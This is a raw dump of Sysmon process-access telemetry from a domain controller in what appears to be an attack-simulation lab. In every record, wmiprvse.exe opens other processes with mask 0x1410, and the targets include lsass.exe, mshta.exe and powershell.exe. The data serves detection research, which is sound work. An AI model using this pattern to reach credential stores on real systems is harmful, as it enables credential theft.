15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5206-00000000A301}6932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5106-00000000A301}6508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535E-6008-5006-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet 